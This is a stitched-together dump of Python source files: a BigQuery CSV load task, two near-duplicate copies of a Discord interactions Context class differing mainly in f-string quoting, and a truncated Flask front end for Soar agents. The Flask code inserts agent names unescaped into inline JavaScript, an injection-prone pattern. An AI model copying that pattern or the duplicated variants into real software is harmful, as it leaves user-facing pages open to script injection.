CSV.""" job_config = bigquery.LoadJobConfig() job_config.skip_leading_rows = int(self.skip_leading_rows) job_config.allow_quoted_newlines = self.allow_quoted_newlines job_config.field_delimiter = self.field_delimiter # The source format defaults to CSV, so the line below is optional. job_config.source_format = bigquery.SourceFormat.CSV table_ref = self.bq_client.dataset( self.stage_dataset_id).table(self.get_name()) uri = f'gs://{GCS_BUCKET}/' + get_path_prefix(path_prefix=self.path_prefix, env=self.get_env(), source_system=self.get_source_system(), source_subsystem=self.get_source_subsystem(), name=self.get_name(), date_valid=self.get_date_valid(), time_valid=self.get_time_valid() ) + '*' logger.info(f'Loading CSV data from `{uri}`.') load_job = self.bq_client.load_table_from_uri( uri, table_ref, job_config=job_config ) try: load_job.result() stage_table = self.bq_client.get_table(table_ref) logger.info( f'Loaded {stage_table.num_rows} rows into {self.get_name()}.') if self.disable_check and stage_table.num_rows == 0: raise TypeError( f'There is no data in {self.stage_dataset_id + '.' + self.get_name()}.') except Exception as e: logger.error(e) logger.error(load_job.errors) raise
# -*- coding: utf-8 -*- """BigQuery Load Task.""" from pathlib import Path from typing import Dict, List from google.cloud import bigquery from luft.common.column import Column from luft.common.config import ( BQ_DATA_TYPES, BQ_HIST_DEFAULT_TEMPLATE, BQ_STAGE_DEFAULT_TEMPLATE, BQ_STAGE_SCHEMA_FORM, GCS_BUCKET, PATH_PREFIX) from luft.common.logger import setup_logger from luft.common.utils import NoneStr, get_path_prefix from luft.tasks.bq_exec_task import BQExecTask import pkg_resources # Setup logger logger = setup_logger('common', 'INFO') class BQLoadTask(BQExecTask): """BQ Load Task.""" def __init__(self, name: str, task_type: str, source_system: str, source_subsystem: str, columns: List[Column], project_id: NoneStr = None, location: NoneStr = None, dataset_id: NoneStr = None, skip_leading_rows: bool = True, allow_quoted_newlines: bool = True, disable_check: bool = False, field_delimiter: str = '\t', path_prefix: NoneStr = None, yaml_file: NoneStr = None, env: NoneStr = None, thread_name: NoneStr = None, color: NoneStr = None): """Initialize BigQuery Load Task. Attributes: name (str): name of task. task_type (str): type of task. E.g. embulk-jdbc-load, mongo-load, etc. source_system (str): name of source system. Usually name of database. Used for better organization especially on blob storage. E.g. jobs, prace, pzr. source_subsystem (str): name of source subsystem. Usually name of schema. Used for better organization especially on blob storage. E.g. public, b2b. env (str): environment - PROD, DEV. thread_name(str): name of thread for Airflow parallelization. color (str): hex code of color. Airflow operator will have this color. """ self.columns = columns self.path_prefix = path_prefix or PATH_PREFIX self.skip_leading_rows = skip_leading_rows self.allow_quoted_newlines = allow_quoted_newlines self.field_delimiter = field_delimiter self.disable_check = disable_check self.dataset_id = dataset_id or source_system self.stage_dataset_id = BQ_STAGE_SCHEMA_FORM.format( env=self.get_env, source_system=self.get_source_system, source_subsystem=self.get_source_subsystem, dataset_id=self.dataset_id ) super().__init__(name=name, task_type=task_type, source_system=source_system, source_subsystem=source_subsystem, yaml_file=yaml_file, project_id=project_id, location=location, env=env, thread_name=thread_name, color=color) def __call__(self, ts: str, env: NoneStr = None): """Make class callable. Attributes: ts (str): time of valid. """ stage_template = Path(pkg_resources.resource_filename( 'luft', BQ_STAGE_DEFAULT_TEMPLATE)) hist_template = Path(pkg_resources.resource_filename( 'luft', BQ_HIST_DEFAULT_TEMPLATE)) env_vars = self.get_env_vars(ts, env) self._create_dataset(self.stage_dataset_id) self._run_bq_command(stage_template.parent, [stage_template.name], env_vars) self.load_csv() self._create_dataset(self.dataset_id) self._run_bq_command(hist_template.parent, [hist_template.name], env_vars) def get_env_vars(self, ts: str, env: NoneStr = None) -> Dict[str, str]: """Get Docker enviromental variables.""" super_env_dict = super().get_env_vars(ts=ts, env=env) env_dict = { 'TABLE_NAME': self.name, 'STAGE_SCHEMA': f'stage_{self.source_system.lower()}', 'HISTORY_SCHEMA': self.source_system.lower(), 'PK': self._get_col_names('pk'), 'PK_DEFINITION_LIST': self._get_col_defs('pk'), 'COLUMNS': self._get_col_names('nonpk'), 'COLUMN_DEFINITION_LIST': self._get_col_defs('nonpk'), 'HASH_COLUMNS': self._get_hash_diff(), 'PK_JOIN': self._get_pk_join() } clean_dict = self.clean_dictionary(env_dict) clean_dict.update(super_env_dict) return clean_dict def _get_col_names(self, col_type: str) -> str: """Get list of column names. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_name(col_type, include_tech=False) for col in self.columns if col.get_name(col_type, include_tech=False)] return ',\n'.join(cols) def _get_col_defs(self, col_type: str) -> str: """Get list of column definition. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES) for col in self.columns if col.get_def(col_type, include_tech=False, supported_types=BQ_DATA_TYPES)] return ',\n '.join(cols) def _get_pk_join(self) -> str: """Get PK join. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ pk_join = [col.get_join('pk', include_tech=False) for col in self.columns if col.get_join('pk', include_tech=False)] return '\nAND '.join(pk_join) def _get_hash_diff(self) -> str: """Get hash diff columns. Parameters: col_type (str): what type of columns should be returned. Default `all`. Values: - all - primary and nonprimary keys are returned - pk - only primary keys are returned - nonpk - only nonprimary keys are returned. """ cols = [f'IFNULL(CAST({col.get_name("all", include_tech=False)} AS STRING), \'\')' for col in self.columns if col.get_name('all', include_tech=False)] return ', '.join(cols) def load_csv(self): """Load CSV.""" job_config = bigquery.LoadJobConfig() job_config.skip_leading_rows = int(self.skip_leading_rows) job_config.allow_quoted_newlines = self.allow_quoted_newlines job_config.field_delimiter = self.field_delimiter # The source format defaults to CSV, so the line below is optional. job_config.source_format = bigquery.SourceFormat.CSV table_ref = self.bq_client.dataset( self.stage_dataset_id).table(self.get_name()) uri = f'gs://{GCS_BUCKET}/' + get_path_prefix(path_prefix=self.path_prefix, env=self.get_env(), source_system=self.get_source_system(), source_subsystem=self.get_source_subsystem(), name=self.get_name(), date_valid=self.get_date_valid(), time_valid=self.get_time_valid() ) + '*' logger.info(f'Loading CSV data from `{uri}`.') load_job = self.bq_client.load_table_from_uri( uri, table_ref, job_config=job_config ) try: load_job.result() stage_table = self.bq_client.get_table(table_ref) logger.info( f'Loaded {stage_table.num_rows} rows into {self.get_name()}.') if self.disable_check and stage_table.num_rows == 0: raise TypeError( f'There is no data in {self.stage_dataset_id + "." + self.get_name()}.') except Exception as e: logger.error(e) logger.error(load_job.errors) raise
from dataclasses import dataclass from typing import Any, List, Union import inspect import itertools import warnings import types import requests from flask_discord_interactions.models import ( LoadableDataclass, Member, Channel, Role, User, CommandOptionType, ApplicationCommandType, Message ) @dataclass class Context(LoadableDataclass): """ Represents the context in which a :class:`Command` or custom ID handler is invoked. Attributes ---------- author A :class:`Member` object representing the invoking user. id The unique ID (snowflake) of this interaction. type The :class:`ApplicationCommandType` of this interaction. token The token to use when sending followup messages. channel_id The unique ID (snowflake) of the channel this command was invoked in. guild_id The unique ID (snowflake) of the guild this command was invoked in. options A list of the options passed to the command. values A list of the values selected, if this is a Select Menu handler. resolved Additional data () command_name The name of the command that was invoked. command_id The unique ID (snowflake) of the command that was invoked. members :class:`Member` objects for each user specified as an option. channels :class:`Channel` objects for each channel specified as an option. roles :class:`Role` object for each role specified as an option. target The targeted :class:`User` or message. """ author: Member = None id: str = None type: int = None token: str = None channel_id: str = None guild_id: str = None options: list = None values: list = None resolved: dict = None command_name: str = None command_id: str = None members: List[Member] = None channels: List[Channel] = None roles: List[Role] = None app: Any = None discord: Any = None custom_id: str = None primary_id: str = None handler_state: list = None target_id: str = None target: Union[User, Message] = None @classmethod def from_data(cls, discord=None, app=None, data={}): if data is None: data = {} # If this is a proxy (e.g. flask.current_app), get the current object # https://flask.palletsprojects.com/en/2.0.x/reqcontext/#notes-on-proxies if hasattr(app, "_get_current_object"): app = app._get_current_object() result = cls( app = app, discord = discord, author = Member.from_dict(data.get("member", {})), id = data.get("id"), type = data.get("data", {}).get("type") or ApplicationCommandType.CHAT_INPUT, token = data.get("token"), channel_id = data.get("channel_id"), guild_id = data.get("guild_id"), options = data.get("data", {}).get("options"), values = data.get("data", {}).get("values", []), resolved = data.get("data", {}).get("resolved", {}), command_name = data.get("data", {}).get("name"), command_id = data.get("data", {}).get("id"), custom_id = data.get("data", {}).get("custom_id") or "", target_id = data.get("data", {}).get("target_id"), ) result.data = data result.parse_custom_id() result.parse_resolved() result.parse_target() return result @property def auth_headers(self): if self.discord: return self.discord.auth_headers(self.app) else: return self.frozen_auth_headers def parse_custom_id(self): """ Parse the custom ID of the incoming interaction data. This includes the primary ID as well as any state stored in the handler. """ self.primary_id = self.custom_id.split("\n", 1)[0] self.handler_state = self.custom_id.split("\n") def parse_resolved(self): """ Parse the ``"resolved"`` section of the incoming interaction data. This section includes objects representing each user, member, channel, and role passed as an argument to the command. """ self.members = {} for id in self.resolved.get("members", {}): member_info = self.resolved["members"][id] member_info["user"] = self.resolved["users"][id] self.members[id] = Member.from_dict(member_info) self.channels = {id: Channel.from_dict(data) for id, data in self.resolved.get("channels", {}).items()} self.roles = {id: Role.from_dict(data) for id, data in self.resolved.get("roles", {}).items()} self.messages = { id: Message.from_dict(data) for id, data in self.resolved.get("messages", {}).items() } def parse_target(self): """ Parse the target of the incoming interaction. For User and Message commands, the target is the relevant user or message. This method sets the `ctx.target` field. """ if self.type == ApplicationCommandType.USER: self.target = self.members[self.target_id] elif self.type == ApplicationCommandType.MESSAGE: self.target = self.messages[self.target_id] else: self.target = None def create_args(self): """ Create the arguments which will be passed to the function when the :class:`Command` is invoked. """ if self.type == ApplicationCommandType.CHAT_INPUT: return self.create_args_chat_input() elif self.type == ApplicationCommandType.USER: return [self.target], {} elif self.type == ApplicationCommandType.MESSAGE: return [self.target], {} def create_args_chat_input(self): """ Create the arguments for this command, assuming it is a ``CHAT_INPUT`` command. """ def create_args_recursive(data, resolved): if not data.get("options"): return [], {} args = [] kwargs = {} for option in data["options"]: if option["type"] in [ CommandOptionType.SUB_COMMAND, CommandOptionType.SUB_COMMAND_GROUP]: args.append(option["name"]) sub_args, sub_kwargs = create_args_recursive( option, resolved) args += sub_args kwargs.update(sub_kwargs) elif option["type"] == CommandOptionType.USER: member_data = resolved["members"][option["value"]] member_data["user"] = resolved["users"][option["value"]] kwargs[option["name"]] = Member.from_dict(member_data) elif option["type"] == CommandOptionType.CHANNEL: kwargs[option["name"]] = Channel.from_dict( resolved["channels"][option["value"]]) elif option["type"] == CommandOptionType.ROLE: kwargs[option["name"]] = Role.from_dict( resolved["roles"][option["value"]]) else: kwargs[option["name"]] = option["value"] return args, kwargs return create_args_recursive({"options": self.options}, self.resolved) def create_handler_args(self, handler): """ Create the arguments which will be passed to the function when a custom ID handler is invoked. Parameters ---------- data An object with the incoming data for the invocation. """ args = self.handler_state[1:] sig = inspect.signature(handler) iterator = zip( itertools.count(), args, itertools.islice(sig.parameters.values(), 1, None) ) for i, argument, parameter in iterator: annotation = parameter.annotation if annotation == int: args[i] = int(argument) elif annotation == bool: if argument == "True": args[i] = True elif argument == "False": args[i] = False elif argument == "None": args[i] = None else: raise ValueError( f"Invalid bool in handler state parsing: {args[i]}") return args def followup_url(self, message=None): """ Return the followup URL for this interaction. This URL can be used to send a new message, or to edit or delete an existing message. Parameters ---------- message The ID of the message to edit or delete. If None, sends a new message. If "@original", refers to the original message. """ url = (f"{self.app.config["DISCORD_BASE_URL"]}/webhooks/" f"{self.app.config["DISCORD_CLIENT_ID"]}/{self.token}") if message is not None: url += f"/messages/{message}" return url def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. """ updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return updated = requests.patch( self.followup_url(message), json=updated.dump_followup(), headers=self.auth_headers ) updated.raise_for_status() def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.delete( self.followup_url(message), headers=self.auth_headers ) response.raise_for_status() def send(self, message): """ Send a new followup message. Parameters ---------- message The :class:`Message` to send as a followup message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return message = Message.from_return_value(message) message = requests.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) message.raise_for_status() return message.json()["id"] def get_command(self, command_name=None): "Get the ID of a command by name." if command_name is None: return self.command_id else: try: return self.app.discord_commands[command_name].id except KeyError: raise ValueError(f"Unknown command: {command_name}") def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config["DISCORD_BASE_URL"]}/" f"applications/{self.app.config["DISCORD_CLIENT_ID"]}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.put(url, headers=self.auth_headers, json={ "permissions": data }) response.raise_for_status() def freeze(self): "Return a copy of this Context that can be pickled for RQ and Celery." app = types.SimpleNamespace() CONFIG_KEYS = [ "DISCORD_BASE_URL", "DISCORD_CLIENT_ID", "DONT_REGISTER_WITH_DISCORD", ] app.config = { key: self.app.config[key] for key in CONFIG_KEYS } new_context = Context.from_data(app=app, data=self.data) new_context.frozen_auth_headers = self.auth_headers return new_context @dataclass class AsyncContext(Context): """ Represents the context in which an asynchronous :class:`Command` is invoked. Also provides coroutine functions to handle followup messages. Users should not need to instantiate this class manually. """ def __post_init__(self): if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return self.session = self.app.discord_client_session async def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. """ updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.patch( self.followup_url(message), json=updated.dump_followup() ) async def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.delete(self.followup_url(message)) async def send(self, message): """ Send a new followup message. Parameters ---------- message The Message object to send as a followup message. """ message = Message.from_return_value(message) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return async with self.session.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) as message: return (await message.json())["id"] async def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config["DISCORD_BASE_URL"]}/" f"applications/{self.app.config["DISCORD_CLIENT_ID"]}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.put(url, headers=self.auth_headers, json={ "permissions": data }) async def close(self): """ Deprecated as of v1.0.2. Previously, this closed the AsyncContext's aiohttp ClientSession that was used to send followup messages. This is no longer necessary, as this library now maintains a single ClientSession for the entire application. """ warnings.warn( "Deprecated! AsyncContext.close is a no-op. " "Since v1.0.2, only one aiohttp ClientSession is created " "for all requests to Discord for the app. " "Thus, there is no need to close the AsyncContext. ", DeprecationWarning )
from dataclasses import dataclass from typing import Any, List, Union import inspect import itertools import warnings import types import requests from flask_discord_interactions.models import ( LoadableDataclass, Member, Channel, Role, User, CommandOptionType, ApplicationCommandType, Message ) @dataclass class Context(LoadableDataclass): """ Represents the context in which a :class:`Command` or custom ID handler is invoked. Attributes ---------- author A :class:`Member` object representing the invoking user. id The unique ID (snowflake) of this interaction. type The :class:`ApplicationCommandType` of this interaction. token The token to use when sending followup messages. channel_id The unique ID (snowflake) of the channel this command was invoked in. guild_id The unique ID (snowflake) of the guild this command was invoked in. options A list of the options passed to the command. values A list of the values selected, if this is a Select Menu handler. resolved Additional data () command_name The name of the command that was invoked. command_id The unique ID (snowflake) of the command that was invoked. members :class:`Member` objects for each user specified as an option. channels :class:`Channel` objects for each channel specified as an option. roles :class:`Role` object for each role specified as an option. target The targeted :class:`User` or message. """ author: Member = None id: str = None type: int = None token: str = None channel_id: str = None guild_id: str = None options: list = None values: list = None resolved: dict = None command_name: str = None command_id: str = None members: List[Member] = None channels: List[Channel] = None roles: List[Role] = None app: Any = None discord: Any = None custom_id: str = None primary_id: str = None handler_state: list = None target_id: str = None target: Union[User, Message] = None @classmethod def from_data(cls, discord=None, app=None, data={}): if data is None: data = {} # If this is a proxy (e.g. flask.current_app), get the current object # https://flask.palletsprojects.com/en/2.0.x/reqcontext/#notes-on-proxies if hasattr(app, "_get_current_object"): app = app._get_current_object() result = cls( app = app, discord = discord, author = Member.from_dict(data.get("member", {})), id = data.get("id"), type = data.get("data", {}).get("type") or ApplicationCommandType.CHAT_INPUT, token = data.get("token"), channel_id = data.get("channel_id"), guild_id = data.get("guild_id"), options = data.get("data", {}).get("options"), values = data.get("data", {}).get("values", []), resolved = data.get("data", {}).get("resolved", {}), command_name = data.get("data", {}).get("name"), command_id = data.get("data", {}).get("id"), custom_id = data.get("data", {}).get("custom_id") or "", target_id = data.get("data", {}).get("target_id"), ) result.data = data result.parse_custom_id() result.parse_resolved() result.parse_target() return result @property def auth_headers(self): if self.discord: return self.discord.auth_headers(self.app) else: return self.frozen_auth_headers def parse_custom_id(self): """ Parse the custom ID of the incoming interaction data. This includes the primary ID as well as any state stored in the handler. """ self.primary_id = self.custom_id.split("\n", 1)[0] self.handler_state = self.custom_id.split("\n") def parse_resolved(self): """ Parse the ``"resolved"`` section of the incoming interaction data. This section includes objects representing each user, member, channel, and role passed as an argument to the command. """ self.members = {} for id in self.resolved.get("members", {}): member_info = self.resolved["members"][id] member_info["user"] = self.resolved["users"][id] self.members[id] = Member.from_dict(member_info) self.channels = {id: Channel.from_dict(data) for id, data in self.resolved.get("channels", {}).items()} self.roles = {id: Role.from_dict(data) for id, data in self.resolved.get("roles", {}).items()} self.messages = { id: Message.from_dict(data) for id, data in self.resolved.get("messages", {}).items() } def parse_target(self): """ Parse the target of the incoming interaction. For User and Message commands, the target is the relevant user or message. This method sets the `ctx.target` field. """ if self.type == ApplicationCommandType.USER: self.target = self.members[self.target_id] elif self.type == ApplicationCommandType.MESSAGE: self.target = self.messages[self.target_id] else: self.target = None def create_args(self): """ Create the arguments which will be passed to the function when the :class:`Command` is invoked. """ if self.type == ApplicationCommandType.CHAT_INPUT: return self.create_args_chat_input() elif self.type == ApplicationCommandType.USER: return [self.target], {} elif self.type == ApplicationCommandType.MESSAGE: return [self.target], {} def create_args_chat_input(self): """ Create the arguments for this command, assuming it is a ``CHAT_INPUT`` command. """ def create_args_recursive(data, resolved): if not data.get("options"): return [], {} args = [] kwargs = {} for option in data["options"]: if option["type"] in [ CommandOptionType.SUB_COMMAND, CommandOptionType.SUB_COMMAND_GROUP]: args.append(option["name"]) sub_args, sub_kwargs = create_args_recursive( option, resolved) args += sub_args kwargs.update(sub_kwargs) elif option["type"] == CommandOptionType.USER: member_data = resolved["members"][option["value"]] member_data["user"] = resolved["users"][option["value"]] kwargs[option["name"]] = Member.from_dict(member_data) elif option["type"] == CommandOptionType.CHANNEL: kwargs[option["name"]] = Channel.from_dict( resolved["channels"][option["value"]]) elif option["type"] == CommandOptionType.ROLE: kwargs[option["name"]] = Role.from_dict( resolved["roles"][option["value"]]) else: kwargs[option["name"]] = option["value"] return args, kwargs return create_args_recursive({"options": self.options}, self.resolved) def create_handler_args(self, handler): """ Create the arguments which will be passed to the function when a custom ID handler is invoked. Parameters ---------- data An object with the incoming data for the invocation. """ args = self.handler_state[1:] sig = inspect.signature(handler) iterator = zip( itertools.count(), args, itertools.islice(sig.parameters.values(), 1, None) ) for i, argument, parameter in iterator: annotation = parameter.annotation if annotation == int: args[i] = int(argument) elif annotation == bool: if argument == "True": args[i] = True elif argument == "False": args[i] = False elif argument == "None": args[i] = None else: raise ValueError( f"Invalid bool in handler state parsing: {args[i]}") return args def followup_url(self, message=None): """ Return the followup URL for this interaction. This URL can be used to send a new message, or to edit or delete an existing message. Parameters ---------- message The ID of the message to edit or delete. If None, sends a new message. If "@original", refers to the original message. """ url = (f"{self.app.config['DISCORD_BASE_URL']}/webhooks/" f"{self.app.config['DISCORD_CLIENT_ID']}/{self.token}") if message is not None: url += f"/messages/{message}" return url def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. """ updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return updated = requests.patch( self.followup_url(message), json=updated.dump_followup(), headers=self.auth_headers ) updated.raise_for_status() def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.delete( self.followup_url(message), headers=self.auth_headers ) response.raise_for_status() def send(self, message): """ Send a new followup message. Parameters ---------- message The :class:`Message` to send as a followup message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return message = Message.from_return_value(message) message = requests.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) message.raise_for_status() return message.json()["id"] def get_command(self, command_name=None): "Get the ID of a command by name." if command_name is None: return self.command_id else: try: return self.app.discord_commands[command_name].id except KeyError: raise ValueError(f"Unknown command: {command_name}") def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config['DISCORD_BASE_URL']}/" f"applications/{self.app.config['DISCORD_CLIENT_ID']}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if self.app.config["DONT_REGISTER_WITH_DISCORD"]: return response = requests.put(url, headers=self.auth_headers, json={ "permissions": data }) response.raise_for_status() def freeze(self): "Return a copy of this Context that can be pickled for RQ and Celery." app = types.SimpleNamespace() CONFIG_KEYS = [ "DISCORD_BASE_URL", "DISCORD_CLIENT_ID", "DONT_REGISTER_WITH_DISCORD", ] app.config = { key: self.app.config[key] for key in CONFIG_KEYS } new_context = Context.from_data(app=app, data=self.data) new_context.frozen_auth_headers = self.auth_headers return new_context @dataclass class AsyncContext(Context): """ Represents the context in which an asynchronous :class:`Command` is invoked. Also provides coroutine functions to handle followup messages. Users should not need to instantiate this class manually. """ def __post_init__(self): if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return self.session = self.app.discord_client_session async def edit(self, updated, message="@original"): """ Edit an existing message. Parameters ---------- updated The updated Message to edit the message to. message The ID of the message to edit. If omitted, edits the original message. """ updated = Message.from_return_value(updated) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.patch( self.followup_url(message), json=updated.dump_followup() ) async def delete(self, message="@original"): """ Delete an existing message. Parameters ---------- message The ID of the message to delete. If omitted, deletes the original message. """ if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.delete(self.followup_url(message)) async def send(self, message): """ Send a new followup message. Parameters ---------- message The Message object to send as a followup message. """ message = Message.from_return_value(message) if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return async with self.session.post( self.followup_url(), headers=self.auth_headers, **message.dump_multipart() ) as message: return (await message.json())["id"] async def overwrite_permissions(self, permissions, command=None): """ Overwrite the permission overwrites for this command. Parameters ---------- permissions The new list of permission overwrites. command The name of the command to overwrite permissions for. If omitted, overwrites for the invoking command. """ url = ( f"{self.app.config['DISCORD_BASE_URL']}/" f"applications/{self.app.config['DISCORD_CLIENT_ID']}/" f"guilds/{self.guild_id}/" f"commands/{self.get_command(command)}/permissions" ) data = [permission.dump() for permission in permissions] if not self.app or self.app.config["DONT_REGISTER_WITH_DISCORD"]: return await self.session.put(url, headers=self.auth_headers, json={ "permissions": data }) async def close(self): """ Deprecated as of v1.0.2. Previously, this closed the AsyncContext's aiohttp ClientSession that was used to send followup messages. This is no longer necessary, as this library now maintains a single ClientSession for the entire application. """ warnings.warn( "Deprecated! AsyncContext.close is a no-op. " "Since v1.0.2, only one aiohttp ClientSession is created " "for all requests to Discord for the app. " "Thus, there is no need to close the AsyncContext. ", DeprecationWarning )
from flask import Flask, request, url_for app = Flask(__name__) import html import json ############################### ############################### import sys from os import environ as env sys.path.append(env['SOAR_HOME']) import Python_sml_ClientInterface as sml kernel = sml.Kernel_CreateKernelInCurrentThread(True, 0) prints = {} def callback_print_message(mid, user_data, agent, message): global prints prints[user_data].append(message.strip()) ############################### ############################### SITE_TITLE = 'Soar' def _out(l): return "\n".join(l) def _header(ret, title): ret.append('<!doctype html>') ret.append('<html lang="en">') ret.append('<head>') ret.append('<!-- Required meta tags -->') ret.append('<meta charset="utf-8">') ret.append('<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">') ret.append('<link href="{}" rel="stylesheet">'.format(url_for('static', filename="bootstrap.min.css"))) ret.append('<title>{} - {}</title>'.format(html.escape(SITE_TITLE), html.escape(title))) ret.append('<link rel="apple-touch-icon" sizes="57x57" href="{}">'.format(url_for('static', filename="apple-icon-57x57.png"))) ret.append('<link rel="apple-touch-icon" sizes="60x60" href="{}">'.format(url_for('static', filename="apple-icon-60x60.png"))) ret.append('<link rel="apple-touch-icon" sizes="72x72" href="{}">'.format(url_for('static', filename="apple-icon-72x72.png"))) ret.append('<link rel="apple-touch-icon" sizes="76x76" href="{}">'.format(url_for('static', filename="apple-icon-76x76.png"))) ret.append('<link rel="apple-touch-icon" sizes="114x114" href="{}">'.format(url_for('static', filename="apple-icon-114x114.png"))) ret.append('<link rel="apple-touch-icon" sizes="120x120" href="{}">'.format(url_for('static', filename="apple-icon-120x120.png"))) ret.append('<link rel="apple-touch-icon" sizes="144x144" href="{}">'.format(url_for('static', filename="apple-icon-144x144.png"))) ret.append('<link rel="apple-touch-icon" sizes="152x152" href="{}">'.format(url_for('static', filename="apple-icon-152x152.png"))) ret.append('<link rel="apple-touch-icon" sizes="180x180" href="{}">'.format(url_for('static', filename="apple-icon-180x180.png"))) ret.append('<link rel="icon" type="image/png" sizes="192x192" href="{}">'.format(url_for('static', filename="android-icon-192x192.png"))) ret.append('<link rel="icon" type="image/png" sizes="32x32" href="{}">'.format(url_for('static', filename="favicon-32x32.png"))) ret.append('<link rel="icon" type="image/png" sizes="96x96" href="{}">'.format(url_for('static', filename="favicon-96x96.png"))) ret.append('<link rel="icon" type="image/png" sizes="16x16" href="{}">'.format(url_for('static', filename="favicon-16x16.png"))) ret.append('<link rel="manifest" href="{}">'.format(url_for('static', filename="manifest.json"))) ret.append('<meta name="msapplication-TileColor" content="#ffffff">') ret.append('<meta name="msapplication-TileImage" content="{}">'.format(url_for('static', filename="ms-icon-144x144.png"))) ret.append('<meta name="theme-color" content="#ffffff">') ret.append('</head>') ret.append('<body>') ret.append('<div class="container">') ret.append('<h1>{}</h1>'.format(html.escape(title))) def _footer(ret, js=[]): ret.append('</div>') ret.append('<script src="{}"></script>'.format(url_for('static', filename='jquery-3.3.1.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='popper.min.js'))) ret.append('<script src="{}"></script>'.format(url_for('static', filename='bootstrap.min.js'))) ret.append('<script>') ret.append(_out(js)) ret.append('</script>') ret.append('</body>') ret.append('</html>') def _has_needed_post(l): for n in l: if n not in request.form: return False return True def _has_needed_get(l): for n in l: if n not in request.args: return False return True ############################### ############################### @app.route("/", methods=['POST', 'GET']) def hello(): global kernel doc = [] js = [] _header(doc, 'Home') doc.append('<hr />') doc.append('<div class="row" style="margin-bottom: 10px">') doc.append('<div class="col">') doc.append('<h2>New Agent</h2>') doc.append('<form id="fA">') doc.append('<div class="form-row">') doc.append('<div class="col-9"><input type="text" class="form-control" id="newName" value="" placeholder="Enter agent name" /></div>') doc.append('<div class="col"><input type="submit" class="btn btn-primary" id="create" value="create" /></div>') doc.append('</div>') doc.append('</form>') doc.append('</div>') doc.append('</div>') # doc.append('<div class="row">') doc.append('<div class="col">') doc.append('<h2>Existing Agents</h2>') doc.append('<div id="agents" class="card-columns">') doc.append('</div>') doc.append('</div>') doc.append('</div>') # doc.append('</div>') ## js.append('function refreshList() {') js.append('var agentList = $("#agents");') js.append('agentList.empty();') js.append('$.ajax({ url:"/agents", type: "GET", dataType: "json", data:{}, success:function(data) { ') js.append('for (i=0; i<data.length; i++) {') js.append('agentList.append($("<div></div>", {"class":"card"}).append($("<div></div>", {"class":"card-body"}).append([$("<h5></h5>", {"class":"card-title"}).text(data[i]), $("<a></a>", {"class":"btn btn-primary", "href":"/debug?agent="+data[i], "target":"_blank"}).text("debug"), $("<span></span>").text(" "), $("<button></button>", {"class":"btn btn-danger", "onclick":"removeAgent(\"" + data[i] + "\");"}).text("remove")])));') js.append('}') js.append('}});') js.append('}') js.append('function removeAgent(name) {') js.append('$.ajax({ url:"/remove", type: "POST", dataType: "json", data:{ "name":name }, success:function(data) { ') js.append('refreshList();') js.append('}});') js.append('}') js.append('$(document).ready (function() {') js.append('$("#fA").submit(function(event) {') js.append('event.preventDefault();') js.append('var c = $("#newName")[0].value;') js.append('if ($.trim(c).length > 0)') js.append('$.ajax({ url:"/create", type: "POST", dataType: "json", data:{ 